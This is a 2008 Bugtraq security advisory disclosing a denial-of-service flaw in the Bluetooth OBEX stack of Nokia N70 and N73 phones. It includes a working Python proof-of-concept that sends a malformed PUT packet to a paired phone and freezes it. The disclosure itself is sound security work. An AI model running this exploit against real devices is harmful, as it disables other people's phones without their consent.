Nokia N70/N73 Bluetooth Stack OBEX Implementation Denial of Service

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Nokia N70/N73 Bluetooth Stack OBEX Implementation Denial of Service
From: yangdn@xxxxxxxxxxx
Date: Thu, 11 Dec 2008 20:12:13 -0700
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Nokia N70/N73 Bluetooth Stack OBEX Implementation Denial of Service

------------------------------------------------------------------
I. Summary

Nokia N70 and N73 are two popular models from Nokia's N-series lineup of smart 
phones. A flaw has been found in the OBEX implementation in these two models, 
which is related to illegal characters in the Name header of a PUT request in 
an OBEX session. These characters can't be handled properly by the OBEX 
implementation and will cause denial of service (phone lockup) if exploited 
successfully.

------------------------------------------------------------------
II. Description

According to the IrOBEX specification, certain path characters (i.e. ':', '/' 
and '\') are not allowed in the string of the Name header. However, the OBEX 
implementation in N70/N73, and possibly other models, failed to cope with 
exceptional conditions to this prescription, and in the case that the Name 
string consists of one of the following Unicode characters: 

        0x0009 (Tab)
        0x000a (Line feed)
        0x000b (Vertical tab)
        0x000c (Form feed)
        0x000d (Carriage return)
        0x003a (':')
        0x005c ('\')

the bluetooth stack would crash and cause the phone to freeze. It should be 
noted that in order to exploit this, the attacker will have to pair with victim 
phone in the first place. This vulnerability can be illustrated by the 
following python code (require the PyBluez package, tested under Python 2.5.2, 
PyBluez 0.15 with Microsoft bluetooth stack from Windows XP SP2):

# PoC code to demonstrate the flaw in the OBEX implementation of Nokia phones
# Tested under Windows XP SP2
# Coded by the penetration test team Of NCNIPC (China)

# PyBluez are required to run the code
from bluetooth import *

# Bluetooth address and OBEX channel of the target device
# Replace them with the appropriate values for your device
target = ("00:15:A0:F9:E6:03", 10)

# Make a connection
sock = BluetoothSocket(RFCOMM)
sock.connect(target)

# Connect to the OBEX service
connect_pkg = "\x80\x00\x07\x10\x00\xff\xfe"
sock.send(connect_pkg)
con_recv=sock.recv(20)

if con_recv[0]=='\xa0':
    # Now we are connected

    # The name string that consists of a single 0x0009 character, which will
    # cause the phone to lock up
    name_str = "\x00\x09"
    
    # Construct and send the malformed packet
    name_header = "\x01\x00" + chr(len(name_str) + 5) + name_str + "\x00\x00";
    body_header = 
"\x49\x00\xa0\x42\x45\x47\x49\x4e\x3a\x56\x43\x41\x52\x44\x0d\x0a\x56\x45\x52\x53\x49\x4f\x4e\x3a\x32\x2e\x31\x0d\x0a\x4e\x3b\x45\x4e\x43\x4f\x44\x49\x4e\x47\x3d\x38\x42\x49\x54\x3b\x43\x48\x41\x52\x53\x45\x54\x3d\x55\x54\x46\x2d\x38\x3a\x42\x6c\x6f\x67\x67\x73\x3b\x4a\x6f\x65\x0d\x0a\x54\x45\x4c\x3b\x50\x52\x45\x46\x3b\x43\x45\x4c\x4c\x3b\x56\x4f\x49\x43\x45\x3a\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x0d\x0a\x54\x45\x4c\x3b\x56\x4f\x49\x43\x45\x3a\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x0d\x0a\x45\x4d\x41\x49\x4c\x3a\x72\x6f\x6f\x74\x40\x65\x78\x61\x6d\x70\x6c\x65\x2e\x63\x6f\x6d\x0d\x0a\x45\x4e\x44\x3a\x56\x43\x41\x52\x44\x0d\x0a"
    put_pkg = "\x82\x00" + chr(len(name_header) + len(body_header) + 3) + 
name_header + body_header
    print "Packet dump: ", binascii.b2a_hex(put_pkg)
    sock.send(put_pkg)
    print "Packet sent"

    try:
        resp = sock.recv(20)
        print "Response dump: %s" %(binascii.b2a_hex(resp))
    except:
        print "Failed to receive response: ", sys.exc_info()[0]
    
    sock.close()

------------------------------------------------------------------
III. Impact

Denial of service: the phone would freeze and loss responsiveness, the only way 
to make it function normally is to take out battery, reinstall it and power on 
the phone.

------------------------------------------------------------------
IV. Affected

Nokia N70 and N73. Other phone models may also be affected due to code reuse.

------------------------------------------------------------------
V. Solution

Don't pair with suspicious bluetooth device. Disable bluetooth if necessary.

------------------------------------------------------------------
VI. Credit

The penetration test team Of NCNIPC (China) is credited for this vulnerability.

Prev by Date: rPSA-2008-0336-1 tshark wireshark
Next by Date: [SECURITY] [DSA 1685-1] New uw-imap packages fix multiple vulnerabilities
Previous by thread: rPSA-2008-0336-1 tshark wireshark
Next by thread: [SECURITY] [DSA 1685-1] New uw-imap packages fix multiple vulnerabilities
Index(es):
- Date
- Thread